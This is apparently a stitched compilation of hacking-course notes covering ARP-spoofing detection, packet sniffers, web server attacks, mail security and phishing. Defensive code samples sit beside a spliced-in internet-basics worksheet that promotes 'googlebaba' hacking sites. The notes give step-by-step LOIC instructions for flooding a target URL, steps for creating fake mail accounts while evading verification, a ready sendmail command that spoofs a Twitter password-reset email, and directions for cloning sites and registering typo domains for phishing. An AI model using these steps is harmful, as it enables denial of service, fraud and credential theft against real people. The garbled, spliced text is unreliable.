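The core of what ARPWatch does fits in a few dozen lines. The following is an added example written for these notes, not arpwatch's own code: it records the Ethernet/IP pairings seen in ARP replies and reports when an address suddenly answers from a different MAC, or flips back and forth between two MACs, which is what the ARP-spoofing attack described earlier looks like on the wire. The event names borrow arpwatch's vocabulary ("new station", "changed ethernet address", "flip flop"); the observations are constructed, and on a real network they would come from a capture of ARP replies.

```python
"""Added example (not arpwatch's own code): track Ethernet/IP pairings
seen in ARP replies and report changes, the way ARPWatch does.  The
observations are constructed sample data."""
from collections import defaultdict

# Constructed ARP observations: (time, ip, mac) from replies seen on the LAN.
OBSERVATIONS = [
    (0,   "192.0.2.1",  "00:11:22:33:44:01"),   # the gateway
    (1,   "192.0.2.50", "00:11:22:33:44:50"),
    (60,  "192.0.2.1",  "00:11:22:33:44:01"),   # same pairing again: quiet
    (120, "192.0.2.1",  "de:ad:be:ef:00:99"),   # gateway "moves" to a new MAC
    (125, "192.0.2.1",  "00:11:22:33:44:01"),   # and back again
    (130, "192.0.2.1",  "de:ad:be:ef:00:99"),
    (200, "192.0.2.60", "00:11:22:33:44:60"),   # a genuinely new station
]

class ArpWatcher:
    def __init__(self):
        self.current = {}                  # ip -> mac currently claimed
        self.seen = defaultdict(set)       # ip -> every mac ever seen for it
        self.changes = defaultdict(int)    # ip -> number of mac changes

    def observe(self, t, ip, mac):
        """Feed one ARP reply; return an event string, or None when nothing changed."""
        mac = mac.lower()
        old = self.current.get(ip)
        if old is None:
            self.current[ip] = mac
            self.seen[ip].add(mac)
            return f"{t}: new station {ip} is-at {mac}"
        if old == mac:
            return None
        self.changes[ip] += 1
        # Returning to a MAC seen earlier for this IP is the flip-flop pattern.
        kind = "flip flop" if mac in self.seen[ip] else "changed ethernet address"
        self.seen[ip].add(mac)
        self.current[ip] = mac
        return f"{t}: {kind} {ip} {old} -> {mac}"

    def suspects(self, min_changes=2):
        """IPs whose MAC changed at least `min_changes` times: a strong signal
        of spoofing, since real hardware is rarely replaced twice in a row."""
        return sorted(ip for ip, n in self.changes.items() if n >= min_changes)

def run(observations):
    """Replay observations; return (event list, suspect IPs)."""
    w = ArpWatcher()
    events = [e for e in (w.observe(*o) for o in observations) if e]
    return events, w.suspects()

if __name__ == "__main__":
    events, suspects = run(OBSERVATIONS)
    print("\n".join(events))
    print("suspects:", suspects)
```

A single "changed ethernet address" can be legitimate (a replaced NIC, a failover to a standby router), which is why the suspect list requires repeated changes; the gateway address is the one most worth watching, because that is the entry a spoofer overwrites to see everyone's outbound traffic.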



Finally, how do I protect myself or my packets? 

We can protect packets through: 

□ SSL (Secure Sockets Layer): encrypts packets in different ways, with 40-bit to 128-bit keys, 
to get a secure channel for database communication or SMTP. 

□ We also use something called SSL over HTTP, "HTTPS", in e-commerce and e-mail. 

□ TLS (Transport Layer Security), which is based on SSL and needs certificates, nowadays 
called web-based certificates. 

□ IPSec protocol: it works at the IP layer (the network layer of the OSI model) and encrypts all sent packets. 

Ultra Network Sniffer 

Ultra Network Sniffer is a powerful network visibility tool. It consists of a well-integrated set of 
functions that you can use to resolve network problems. 

□ Ultra Network Sniffer will list all network packets in real time from multiple network cards (including 
modem, ISDN, ADSL) and also supports capturing packets based on the application. 

□ Ultra Network Sniffer will capture the evidence of network intrusions. 

□ Ultra Network Sniffer allows the network administrator to capture and retrace the steps of any 
network user. 

Features 

□ Monitor network activity in real time. 

□ Dynamic network statistics and charts. 

□ Expert HTML export. 

□ Permanent, lifetime free software updates for registered users. 

□ Capture network traffic for detailed analysis. 

□ Capture network traffic based on application (TDI, SOCKET). 

□ Probe the network with active tools to simulate traffic, measure response times, and troubleshoot 
problems. 

□ Powerful packet generator in order to analyze network status and resolve problems. 

□ Supports all Windows versions (Windows XP/2000/NT/ME/98/95). 



How to use it 


□ After installing Ultra Network Sniffer, choose the network adapter that you want to monitor, and click 
on the Start Capture button in the main toolbar. 

Interface 

□ This window displays packets as they arrive from the wire. The packet display window allows you 
to select specific packets to be shown in the Decoder Window. It also allows you to right-click a specific 
packet and perform certain functions on it. 

□ The user can drag a packet to the packet generator 
window to send the packet to the network. 


Packet Decoder 

□ This window is used to display information about the structure of the packet from Packet List 
window, in an easy to understand tree form. 

□ This provides a simpler way of displaying the various aspects of the packet. 

□ Each header it finds (MAC Header, IP Header, ICMP Header, TCP Header, and UDP Header) will 
be broken down, displaying each part of the packet and the data it contains within. 


Packet Generator 

□ Packet Generator allows you to edit and send packets via your network card 



Packet editor 

• The Data Frame Editor allows the user to change the packet contents and have the packet decode 
displayed in the bottom window as you edit it. 

• You can create packets of any kind, and you can choose which network adapter sends the packet. The user 
can use "compute CRC" to automatically correct the checksum. 



How to filter packets 

□ Example: capture only traffic to or from 10.0.0.2 using the "IP" protocol. 
1. Select main menu "Monitor --> Option". 

2. Select the page named "Protocol Filter". 

3. Uncheck all protocols and check only the protocol "IP", together with its parent protocol and child protocols. 

4. Select the page named "Advanced Filter". 

5. Check "IP" in the list box; a list appears in the right part of the page. 

6. There are three buttons to the right of the list: "+" adds an IP filter, "-" deletes one, and the third 
modifies the selected filter. 

7. Click "+" to add an IP filter. The IP Filter dialog appears. 

8. Enter 10.0.0.2 in the Station 1 field and "any IP address" in the Station 2 field. 

9. Enter the protocol of interest in Protocol Type. 

10. Enter the direction between the stations in Dir. 

11. Mode: Include captures only the packets that match the filter; Exclude discards the matching packets 
and captures everything else. (The two are easy to confuse; check the first few captured packets before trusting the filter.) 
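The station / direction / Include-Exclude semantics from the steps above, written out as a small Python filter. This is an added example, not code from the sniffer: the packets are constructed, and the field names (station1, station2, protocol, direction, mode) are taken from the dialog described above.

```python
"""IP filter with the same fields as the sniffer's IP Filter dialog:
station1, station2, protocol type, direction and mode (Include / Exclude).
Added example, not the sniffer's own code; the packets below are constructed."""
from __future__ import annotations

from dataclasses import dataclass

ANY = "any"  # the dialog's "any ip address" (and: any protocol)


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str  # "TCP", "UDP", "ICMP", ...


@dataclass(frozen=True)
class IPFilter:
    station1: str
    station2: str = ANY
    protocol: str = ANY
    direction: str = "both"  # "1->2", "2->1" or "both"
    mode: str = "include"    # "include" keeps matches, "exclude" drops them

    def _pair(self, a: str, b: str, pkt: Packet) -> bool:
        """True when pkt flows from station a to station b (ANY matches every address)."""
        return (a == ANY or pkt.src == a) and (b == ANY or pkt.dst == b)

    def matches(self, pkt: Packet) -> bool:
        if self.protocol != ANY and pkt.proto != self.protocol:
            return False
        forward = self._pair(self.station1, self.station2, pkt)
        reverse = self._pair(self.station2, self.station1, pkt)
        if self.direction == "1->2":
            return forward
        if self.direction == "2->1":
            return reverse
        return forward or reverse


def apply_filter(pkts: list[Packet], flt: IPFilter) -> list[Packet]:
    """Include = capture only matching packets; Exclude = capture everything except them."""
    if flt.mode == "include":
        return [p for p in pkts if flt.matches(p)]
    return [p for p in pkts if not flt.matches(p)]


# Constructed sample traffic, not a real capture.
SAMPLE = [
    Packet("10.0.0.2", "10.0.0.1", "TCP"),
    Packet("10.0.0.1", "10.0.0.2", "TCP"),
    Packet("10.0.0.3", "10.0.0.1", "UDP"),
    Packet("10.0.0.2", "10.0.0.9", "ICMP"),
]


def capture_host(pkts: list[Packet], host: str) -> list[Packet]:
    """Step 8 of the walkthrough: station 1 = host, station 2 = any address, both directions, Include."""
    return apply_filter(pkts, IPFilter(station1=host))


if __name__ == "__main__":
    for p in capture_host(SAMPLE, "10.0.0.2"):
        print(p)
```

Swapping mode to "exclude" on the same filter returns only the 10.0.0.3 packet, which is the quickest way to confirm which way round the tool's Include/Exclude really is.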


Packet Sniffing Tools 


• Ethereal (now Wireshark) 

• Ksniffer 

• Snort 

• IpGrab 

• IpLog 


17. Internet Basics 



Practice Words - 

Directions: Draw a line from the word to the item in the picture. 
Writing Web Page Addresses 

Directions: Copy the web page addresses. Don’t make any spaces or capitals. 

Example: 
Reading a Web Page 

Directions: Find the information on the web page. Draw a line and circle it. 




[screenshot: browser address bar showing http://ext.sacollege.org/continuing_education/] 
Opening a Web Page 
Directions: Follow the instructions. 

1. Open the Internet by double-clicking the browser shortcut icon on your desktop. 









2. Click in the address box. 





3. Type www.sacollege.org in the address box. 
4. Click the Go button or press Enter on the keyboard. 


5. Read the web page 




8. Exit the Internet by clicking on the X in the top right corner. 


[screenshot: browser window titled "Welcome to Santa Ana College!" in Microsoft Internet Explorer] 
Going Backward and Forward 
Directions: Follow the instructions. 

1. Open the Internet and go to the web pages. Check that you opened each web 
page correctly. If you go to the wrong web page, start again! 

□ Go to www.yahoo.com 

□ Go to www.sacollege.org 

□ Go to www.googlebaba9.weebly.com 

□ Go to www.meravideo.xtwap.in 

□ Go to www.bowers.org 

□ Go to www.googlebaba.oyer-blog.com 



2. Find the Back and Forward buttons 

3. Click the Back button three times. 

4. Click on the Forward button two times. 

5. What is the web page now? 

Address 

6. Exit the Internet. 


Scrolling 

Directions: Follow the instructions. 

1. Open the Internet browser. 

2. Go to www.meravideo.xtwap.in 

3. Go to the bottom of the page. To go to the bottom of the page, click on the 
scroll bar and hold the button down. Then drag the bar down. When it is at 
the bottom, release the bar. 

4. Complete the sentence from the bottom of the web page. Important information about this 


5. Go to the top of the page. To go to the top of the page, click on the scroll 
bar and hold the button down. Then drag the bar up. When it is at the top, 
release the bar. 






Going to Links 

Directions: Follow the instructions. 

1. Open the Internet. 

2. Go to www.dmv.ca.gov 



Practice Going to Links 

Directions: Open the Internet and follow the instructions. 


1. Follow the instructions to find the weather for Santa Ana. 

■ Open weather.yahoo.com 

■ Click United States 

■ Scroll down to California and click on it. 

■ Click “S” for Santa Ana. 

■ Scroll down and find Santa Ana and click on it. 

What is the temperature currently in Santa Ana? 

■ Click the back button four times and find the weather for 
another city. 

What is the city name and current (right now) temperature? 

City Name: 

Temperature : 



2. Follow the instructions. 


■ Open www.meravideo.xtwap.in 

■ Click on information. 

3. Follow the instructions. 

■ Open www.googlebaba.over-blog.com 

■ Learn online ethical hacking. 


Follow me on Twitter: @jaysinghnagvanshi 

Add me on Facebook: m.facebook.com/chunchunbaba 


18. Web Security, Web Attacks 

Web Server - 

Entry point for clients 


- To a variety of services 

- Customized for clients (e.g., via cookies) 

- Supported by complex backend applications (e.g. databases) 


Target of attackers 

- Common protocol 

- Supports a wide range of inputs 

- Complex software interactions 

- Running with high privilege 


Q: How does all this affect the server? 

- Vulnerabilities, threats, risks 


Web Server Deployments 

Note the multiple application layers and the connection to legacy code 

[diagram: user browser -> web server -> application layers -> legacy/backend systems] 

Web Server Software - 

Ex - IIS 7 

[screenshot: IIS 7 setup components (40 components, including FTP Publishing)] 
Server Side Scripting - 

Program placed directly in the content, run at request time, with its output returned in the content 

- MS active server pages (ASP) 









- server-side JavaScript 

- python, .... 


Nice at generating output 

- Dangerous if tied to user input 



Dynamic Content Security - 

Largely just applications 

- Only as secure as the applications themselves are 

- Command shells and interpreters are dangerous 


• Three things to prevent dynamic content (DC) vulnerabilities 

- Validate input 

• Input is often received as part of user-supplied data 

• E.g., a cookie 

- Limit program functionality 

• Don't leave open-ended functionality 

- Execute with limited privileges 


Web Server Vulnerabilities - 

Not surprisingly, these are numerous 

• For IIS 5, the focus was on function 

- All services were ON by default 

- Buffer overflows -- e.g., Code Red (2001) 

• Interactions between components are complex 

- HTTP input flows into database queries 

- SQL injection -- user input is executed directly as part of the query 

• Web server permissions 

- Web servers have broad access 

- Deface the web site -- modify server files 

- Compromise the system -- modify system files 
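The "HTTP input to database query" path above, as an added example that is not code from the notes: the injectable login check next to its parameterized form, plus the input allowlist that the "validate input" bullet calls for. The sqlite3 table, its two rows and the payload are constructed for the demonstration.

```python
"""SQL injection: user input executed directly as part of the query, beside two fixes.
Added example, not from the original notes; table, rows and payload are constructed."""
from __future__ import annotations

import re
import sqlite3

USERNAME_RE = re.compile(r"^[a-z0-9_]{1,32}$")  # allowlist: what a username may look like


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn: sqlite3.Connection, user: str, pw: str) -> list[str]:
    """Executes user input directly: the request parameters become part of the SQL text."""
    q = f"SELECT name FROM users WHERE name = '{user}' AND password = '{pw}'"
    return sorted(row[0] for row in conn.execute(q))


def login_parameterized(conn: sqlite3.Connection, user: str, pw: str) -> list[str]:
    """Bound parameters: the database never parses the input as SQL."""
    q = "SELECT name FROM users WHERE name = ? AND password = ?"
    return sorted(row[0] for row in conn.execute(q, (user, pw)))


def login_validated(conn: sqlite3.Connection, user: str, pw: str) -> list[str]:
    """Defence in depth: reject input that cannot be a username before it reaches the query at all."""
    if not USERNAME_RE.match(user):
        return []
    return login_parameterized(conn, user, pw)


if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"   # closes the password literal, then adds an always-true clause
    print("vulnerable:    ", login_vulnerable(db, "alice", payload))      # every user
    print("parameterized: ", login_parameterized(db, "alice", payload))  # nobody
    print("validated:     ", login_validated(db, payload, "x"))          # rejected early
```

The payload turns the WHERE clause into `(name = 'alice' AND password = '') OR '1'='1'`, which is why the vulnerable version returns every account; the parameterized version sends the same bytes as data, so they never reach the SQL parser.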



Web Server as a Host Security Problem 

• Adversary’s Goal 

- Integrity/Secrecy/Availability 

- Get code running on your system 

• That is under the adversary’s control 

• Ways to Execute Code 

- Accessible interfaces 

• Defense: minimize attack surface 

- Vulnerable interfaces 

• Defense: prevent the various code injections, e.g., buffer overflows 

• Privilege 

- Attackers want this code to do as much as possible 

• Defense: minimize its privilege 


Common DoS - Request Flood 
Attack: request flooding 

- Overwhelm some resource with (seemingly) legitimate requests 

- e.g., web server, phone system 

• Note: an unintentional flood is called a flash crowd 


DoS Prevention - Reverse Turing Test 

• A Turing test measures whether a human can tell the 
difference between a human and a computer (AI) 

• A reverse Turing test measures whether a user on 
the Internet is a person, a bot, or something else 

• CAPTCHA - Completely Automated Public Turing test 
to tell Computers and Humans Apart 

- contorted image that humans can read and computers can't 

- advances in image processing keep pushing the state of the art, making these harder to design 

• Note: often used not just for DoS prevention, but for 
protecting "free" services (email accounts) 


DoS Prevention - Puzzles 

• Make the requester present evidence of "work" done 

- If the work is proven, then process the request 

- Note: only useful if processing the request costs significantly more 
work than verifying the puzzle 

• Puzzle design 

- Must be hard to solve 

- Easy to verify 

Canonical Example 

- Puzzle: given x bits of an input r (the remaining bits withheld) and h(r), where h is a 
cryptographic hash function 

- Solution: recover the missing bits of r, i.e. find the preimage of h(r) that agrees with the known bits 

- Q: Assume you are given 108 bits of a 128-bit hash input; how hard would it be to solve the puzzle? 
(A: 20 bits are unknown, so at most 2^20, about a million, hash evaluations, and about half that on average; 
verification is a single hash.) 
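The canonical puzzle above, worked through as an added example that is not from the notes. It assumes h is SHA-256 and r is 128 bits (the notes leave h abstract): the server publishes h(r) and the high bits of r, the client brute-forces the withheld low bits, and the server verifies with one hash plus a prefix comparison.

```python
"""Client puzzle: publish h(r) and all but k bits of r; the client recovers the k bits by brute force.
Added example, not from the original notes. h = SHA-256 and a 128-bit r are assumptions."""
from __future__ import annotations

import hashlib
import secrets
from typing import Optional

R_BITS = 128


def h(r: bytes) -> bytes:
    return hashlib.sha256(r).digest()


def make_puzzle(missing_bits: int) -> tuple[int, int, bytes]:
    """Server: draw a random 128-bit r; reveal its high (128 - missing_bits) bits and h(r)."""
    r = secrets.randbits(R_BITS)
    known_prefix = r >> missing_bits
    return known_prefix, missing_bits, h(r.to_bytes(R_BITS // 8, "big"))


def solve_puzzle(known_prefix: int, missing_bits: int, target: bytes) -> tuple[Optional[bytes], int]:
    """Client: try every value of the missing bits. Returns (solution, number of hashes computed)."""
    base = known_prefix << missing_bits
    for low in range(1 << missing_bits):
        cand = (base | low).to_bytes(R_BITS // 8, "big")
        if h(cand) == target:
            return cand, low + 1
    return None, 1 << missing_bits


def verify_solution(known_prefix: int, missing_bits: int, target: bytes, solution: bytes) -> bool:
    """Server: one hash plus a check that the solution keeps the bits that were revealed."""
    r = int.from_bytes(solution, "big")
    return (r >> missing_bits) == known_prefix and h(solution) == target


def worst_case_hashes(total_bits: int, revealed_bits: int) -> int:
    """The slide's question: 108 of 128 bits revealed leaves 20 unknown, so at most 2**20 hashes."""
    return 2 ** (total_bits - revealed_bits)


if __name__ == "__main__":
    puzzle = make_puzzle(16)            # 16 missing bits: at most 65,536 hashes for the client
    solution, tries = solve_puzzle(*puzzle)
    print("solved after", tries, "hashes; verified:", verify_solution(*puzzle, solution))
    print("worst case for 108 of 128 bits:", worst_case_hashes(128, 108))
```

The prefix check in verify_solution matters: without it a client could answer with any preimage it already knew, and the server would have no assurance that fresh work was done for this puzzle.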


Web Attack - 

Tools - 

1. Denial of service attack 

2. RAT (Remote Admin Tool) 

Step By Step (LOIC) - 

1. Download LOIC. 

2. Install the .NET Framework on the PC. 

3. Open LOIC and enter the URL you want to attack. 

4. Set the method (TCP or HTTP), the TCP message, and the port number. 

5. Final step: click the "Lock on" button next to the URL field. 

19. Mail Security, Fake Mailing 


General Strategy 

. Basic scheme is pretty straightforward 

. Encrypt the message body with a symmetric cipher, using a randomly generated traffic key 

. Use public key cryptography to encrypt the traffic key to all recipients 
. Digitally sign a hash of the message 
. But there are many details 

Some Details 

. Obvious ones: which symmetric, public key, and hash algorithms to use? 
. More subtle: which algorithms do the recipients understand? 

. Where do certificates come from? 

. Do you sign the plaintext or the ciphertext? 

. How do you handle BCC? 

. Will the ciphertext survive transit intact? 

. How are header lines protected? 

. What about attachments? 


. Many possible answers to all of these questions 


Transit Issues - 

. Not all mail systems accept all characters 
. Very few are 8-bit clean 

. Cryptographic transforms won't survive even minor changes (one altered byte breaks a signature or a ciphertext) 

. EBCDIC vs. ASCII? Unicode? Tabs versus blanks? 

. Solution: encode all email in base64, using only 
characters all systems accept: A-Za-z0-9+/ 

. Use 4 characters to represent 3 bytes; overhead is 33% 

. For padding, use the = sign (see RFC 3548, since replaced by RFC 4648) 

. Only those characters matter; everything else 
is discarded on receipt, including white space 
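The transit problem above, as an added example that is not from the notes. gateway_rewrite() is a constructed model of what relays do to a message body (tab expansion, trailing-blank stripping, re-wrapping, CRLF line ends); the two survives() checks show that a raw body does not come through byte-for-byte (so a signature over it would fail) while the base64 form decodes to exactly the original.

```python
"""Why a signed or encrypted body is wrapped in base64 before it is mailed.
Added example, not from the original notes; gateway_rewrite() models relay behaviour."""
import base64
import hashlib
import textwrap


def to_transit_form(raw: bytes) -> str:
    """Base64 in 76-column lines, as a mail agent emits it; alphabet A-Za-z0-9+/ with '=' padding."""
    return base64.encodebytes(raw).decode("ascii")


def from_transit_form(text: str) -> bytes:
    """b64decode ignores characters outside the alphabet, so added line breaks and blanks do not matter."""
    return base64.b64decode(text)


def overhead_ratio(raw: bytes) -> float:
    """4 output characters for every 3 input bytes: 33% overhead (ignoring line breaks)."""
    return len(base64.b64encode(raw)) / len(raw)


def fingerprint(body: bytes) -> str:
    """Stand-in for the value a signature covers: any change to the body changes it."""
    return hashlib.sha256(body).hexdigest()


def gateway_rewrite(text: str) -> str:
    """Constructed relay behaviour: expand tabs, strip trailing blanks, re-wrap at 40 columns, CRLF."""
    out = []
    for line in text.splitlines():
        line = line.expandtabs(8).rstrip()
        out.extend(textwrap.wrap(line, 40) or [""])
    return "\r\n".join(out) + "\r\n"


def plain_survives(body: bytes) -> bool:
    """Would a signature over the raw text still verify after the relay?"""
    text = body.decode("latin-1")
    return fingerprint(gateway_rewrite(text).encode("latin-1")) == fingerprint(body)


def encoded_survives(body: bytes) -> bool:
    """Same relay, but the body travelled as base64: the decoded bytes are unchanged."""
    return from_transit_form(gateway_rewrite(to_transit_form(body))) == body


if __name__ == "__main__":
    # Constructed body: a tab, a newline and every byte value, i.e. everything a relay likes to mangle.
    body = b"Transfer\t1000 EUR to account 42\n" + bytes(range(256))
    print("plain body survives transit: ", plain_survives(body))     # False
    print("base64 body survives transit:", encoded_survives(body))   # True
    print("overhead:", overhead_ratio(b"x" * 300))                    # 1.333...
```

The decode side is deliberately tolerant (anything outside the alphabet is dropped), which is what lets the encoding survive re-wrapping and CRLF conversion; the price is the 4:3 expansion shown by overhead_ratio.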

Signing - 

. If you sign the plaintext and then encrypt, the 

sender’s identity is hidden from all except the proper recipients 

. If you sign the ciphertext, a gateway can verify signatures and present mail accordingly — perhaps 
better for anti-spam and anti-phishing 


Headers 

. Headers change in transit 
. Obvious example: Received: lines are added 

. Less obvious example: email addresses are often rewritten to hide internal machines and present cleaner 
addresses to the outside, e.g. smb@att.com -> iaybabaraiput@gmail.com 

. Consequence: headers are not protected by secure email schemes 

. But users look at (and search on) the headers 

General Flow - 

. Collect input message 
. Put in canonical form 
. Encrypt and sign, or sign and encrypt 

. Add metadata: encrypted traffic key, your certificate, algorithm identifiers, etc. 

. Convert to transit form 


. Embed in email message 


Securing Transit 

. Many pieces — but we can usually use TLS 

. POP, IMAP, connection to submission server: all are by prearrangement 
. Protect content; more important, protect Passwords 
. Problem area: road warriors vs. firewalls and anti-spam 

Mail Steps - 

1. Normal process: user composes mail on MUA; submits it to local submission server. 

2. Optional internal hops 

3. Outbound MTA contacts recipient’s MTA — interorganizational hop 

4. Optional internal hops to recipient’s mail server (IMAP or POP) 

5. IMAP or POP retrieval 

6. How do we protect Step 3? 

MTA-to-MTA Security - 


. Do we need to protect it at all? 


. These are hard-to-tap links: phone company fiber, ISP backbones, etc. 

. What about government wiretaps? 

. Can use TLS — but what is the other side’s key? No PKI for Internet email! 

. One answer: don’t worry; it’s still better than cleartext against passive eavesdroppers 
. But — what about routing attacks? 

Traffic Analysis 

. Another reason to secure transit: traffic analysis 
. Protect against traffic analysis — who is talking to whom 
. Also: length, timing 

. In practice, extremely valuable for law enforcement and intelligence agencies 
. Less protected by US law 

Mail Account Security (recovery options) - 

1. Basic recovery option 

2. Recovery question 

3. Mobile number 

4. Mail ID (secondary mail) 


Create Fake Mail 
Step By Step - 

1. Choose a provider (Gmail, Yahoo, MSN, etc.) 

2. Create an account and fill in all the fields 

3. When it asks for a mobile number, clear all browser data 

4. Enter a mobile number and the CAPTCHA / verification code 

5. Finish creating the account, and you are done 


20. Phishing 


"A fake page that looks similar to the original page but is not. It is a page created by a hacker: a fake page with a fake 
URL (web address)." 

Introduction 

Phishing is a form of social engineering in which an attacker, also known as a phisher, attempts to fraudulently 
retrieve legitimate users' confidential or sensitive credentials by mimicking electronic communications from a 
trustworthy or public organization in an automated fashion. The 
word "phishing" appeared around 1995, when Internet scammers were using email lures to "fish" for 
passwords and financial information from the sea of Internet users; "ph" is a common hacker replacement of "f", 
which comes from the original form of hacking, "phreaking" of telephone 
switches during the 1960s. Early phishers copied the code from the AOL website and crafted pages that looked like 
they were part of AOL, and sent spoofed emails or instant messages with a link to this fake web page, asking 
potential victims to reveal their passwords. 

A complete phishing attack involves three roles of phishers. Firstly, mailers send out a large number of 
fraudulent emails (usually through botnets), which direct users to fraudulent websites. Secondly, collectors set 
up fraudulent websites (usually hosted on compromised machines), which 
actively prompt users to provide confidential information. Finally, cashers use the confidential information to 
achieve a pay-out. Monetary exchanges often occur between those phishers. 


Types of Phishing 

Phishing has spread beyond email to include VOIP, SMS, instant messaging, social networking sites, and even 
multiplayer games. Below are some major categories of phishing. 

Clone Phishing 

In this type the phisher creates a cloned email. He does this by taking information such as content and recipient 
addresses from a legitimate email which was delivered previously, then he sends the 
same email with the links replaced by malicious ones. He also employs address spoofing so that the email appears 
to be from the original sender. The email can claim to be a re-send of the original or an updated version as a 
trapping strategy. 

Spear Phishing 

Spear phishing targets a specific group. So instead of casting out thousands of emails randomly, spear 
phishers target selected groups of people with something in common, for example people from 
the same organization. Spear phishing is also used against high-level targets, in a type of attack called 
"whaling". 

For example, in 2008, several CEOs in the U.S. were sent a fake subpoena along with an attachment that 
would install malware when viewed [24]. Victims of spear phishing attacks in late 2010 and 
early 2011 include the Australian Prime Minister's office, the Canadian government, the Epsilon mailing list 
service, HBGary Federal, and Oak Ridge National Laboratory. 

Phone Phishing 

This type of phishing refers to messages that claim to be from a bank, asking users to dial a phone number 
regarding problems with their bank accounts. Traditional phone equipment has dedicated lines, so Voice over 
IP, being easy to manipulate, becomes a good choice for the phisher. Once the phone number, owned by the 
phisher and provided by a VoIP service, is dialed, voice prompts tell the caller to enter her account numbers and 
PIN. Caller ID spoofing, which in many places is not itself prohibited by law (using it to defraud usually is), 
can be used along with this so that the call appears to be from a trusted source. 

Phishing Techniques and Countermeasures 

Various techniques are used to conduct phishing attacks and make them less suspicious. Email spoofing 
is used to make fraudulent emails appear to be from legitimate senders, so that recipients are more likely to 
believe the message and act on its instructions. Web 
spoofing makes forged websites look similar to legitimate ones, so that users will enter confidential 
information into them. Pharming attracts traffic to those forged websites. Malware is installed on victims' 
computers to collect information directly or to aid the other techniques. 

Email Spoofing 

A spoofed email is one that claims to originate from one source when it was actually sent from 
another. Email spoofing is a common phishing technique in which a phisher sends spoofed emails, 
with the sender address and other parts of the email header altered, in order to deceive recipients. 

Spoofed emails usually appear to be from a website or financial institution that the recipient may have business 
with, so that an unsuspecting recipient would probably take actions as instructed 
by the email contents, such as: 

- reply to the email with their credit card number 

- click on the link labelled "view my statement", and enter the password when the (forged) website prompts 
for it 

- open an attached PDF form, and enter confidential information into the form 

Sending a spoofed email 

On a sendmail-enabled UNIX system, one command line is all you need to send a spoofed email 
that appears to be from Twitter (here -a adds a header line; on some mail implementations -a attaches a 
file instead, so check the local man page): 

    cat body.htm | mail -a 'From: Twitter <support@twitter.com>' -a 'Content-Type: text/html' \
        -s 'Reset your Twitter password' victim@example.net 

Why it's possible 

Simple Mail Transfer Protocol is the Internet standard protocol used for electronic mail. Its objective is to 
transfer mail reliably and efficiently, but core SMTP doesn't provide any authentication. An important 
feature of SMTP is its capability to transport mail across multiple networks, referred to as "SMTP mail relaying". 
Basically, receiving and relaying SMTP servers need to trust the upstream server; so it is feasible for a 
malicious user to construct spoofed messages and talk to receiving or relaying SMTP servers directly to 
deliver such a message. 

As RFC 5321 notes, SMTP mail inherently cannot be authenticated at the transport level; real mail security 
lies only in end-to-end methods involving the message bodies, such as Pretty Good Privacy (PGP) and 
Secure/Multipurpose Internet Mail Extensions (S/MIME). However, there is a high cost to deploy those 
digital-signature based countermeasures, because users are reluctant to install an additional piece of software, 
and they don't have enough knowledge of how to manage the trust. 
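Spoofing works because the From: line is just text the sender chose; what the sender does not control are the Return-Path and the Received: lines that each receiving server prepends. The added example below (not from the notes) parses a constructed message modelled on the command above, with addresses from the documentation ranges, and reports the mismatches a mail operator looks for by hand (receiving systems today automate the same comparison with SPF and DMARC).

```python
"""Header analysis of a spoofed message: compare the claimed From: domain with the envelope sender
and the first Received: hop. Added example, not from the original notes; RAW_SPOOF is constructed."""
from __future__ import annotations

import email
import re
from email import policy
from email.message import EmailMessage
from email.utils import parseaddr

# Constructed message: the From: line claims twitter.com, the transport data says otherwise.
RAW_SPOOF = b"""Return-Path: <bounce@mail-relay.example>
Received: from victim-mx.example.net (victim-mx.example.net [198.51.100.7])
\tby mailstore.example.net with ESMTP id abc123; Mon, 1 Jan 2024 10:00:03 +0000
Received: from twitter.com (unknown [203.0.113.55])
\tby victim-mx.example.net with ESMTP id def456; Mon, 1 Jan 2024 10:00:01 +0000
From: Twitter <support@twitter.com>
To: victim@example.net
Subject: Reset your Twitter password
Content-Type: text/html

<html><body>Click <a href="http://203.0.113.55/reset">here</a> to reset.</body></html>
"""

# "from <HELO name> (<reverse DNS> [<ip>])" as most MTAs write it
RECEIVED_RE = re.compile(r"from\s+(?P<helo>\S+)\s+\((?P<rdns>[^\s\[]*)\s*\[(?P<ip>[\d.]+)\]")


def parse(raw: bytes) -> EmailMessage:
    return email.message_from_bytes(raw, policy=policy.default)


def header_domain(msg: EmailMessage, name: str) -> str:
    """Domain part of the address in header `name` ('' if absent)."""
    addr = parseaddr(str(msg.get(name, "")))[1]
    return addr.rpartition("@")[2].lower()


def first_hop(msg: EmailMessage) -> dict:
    """The bottom-most Received: line was written by the first server that accepted the mail."""
    received = msg.get_all("Received") or []
    m = RECEIVED_RE.search(str(received[-1])) if received else None
    return m.groupdict() if m else {}


def spoof_indicators(msg: EmailMessage) -> list[str]:
    findings = []
    from_dom = header_domain(msg, "From")
    envelope_dom = header_domain(msg, "Return-Path")
    if envelope_dom and from_dom != envelope_dom:
        findings.append(f"From domain {from_dom} differs from envelope sender domain {envelope_dom}")
    hop = first_hop(msg)
    if hop and not hop["helo"].endswith(from_dom):
        findings.append(f"first hop HELO {hop['helo']} is unrelated to {from_dom}")
    if hop and hop["rdns"] in ("", "unknown"):
        findings.append(f"first hop {hop['ip']} has no reverse DNS backing its HELO name {hop['helo']}")
    return findings


if __name__ == "__main__":
    for line in spoof_indicators(parse(RAW_SPOOF)):
        print("-", line)
```

Only the last hop's Received: line can be trusted outright (your own server wrote it); everything below it could itself be forged by the sender, which is why the comparison starts from the envelope data your server recorded rather than from the message's own claims.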


Web Spoofing 

A phisher could forge a website that looks similar to a legitimate website, so that victims may think this is the 
genuine website and enter their passwords and personal information, which is collected 
by the phisher. Modern web browsers have certain built-in security indicators that can protect users from 
phishing scams, including domain name highlighting and HTTPS indicators. However, they are often 
neglected by careless users. 

How is web spoofing done? 

Creating a forged website. It's trivial to clone the look of a website by copying the front-end code; a little bit of 
web programming is necessary to redirect the user's input into a file or database, then show a "website under 
maintenance" notice. 

Attracting traffic to the forged website. Once a forged website is online, the phisher must make potential victims 
visit it. There are a few ways to do this: 

- Send spoofed emails with a link to the forged website. 

- Register a domain that is a common typo of a popular website. For example, register paypel.com and 
host a forged paypal.com there. 

- Register the same domain name in a different TLD. Sometimes people will type in their country-specific TLD 
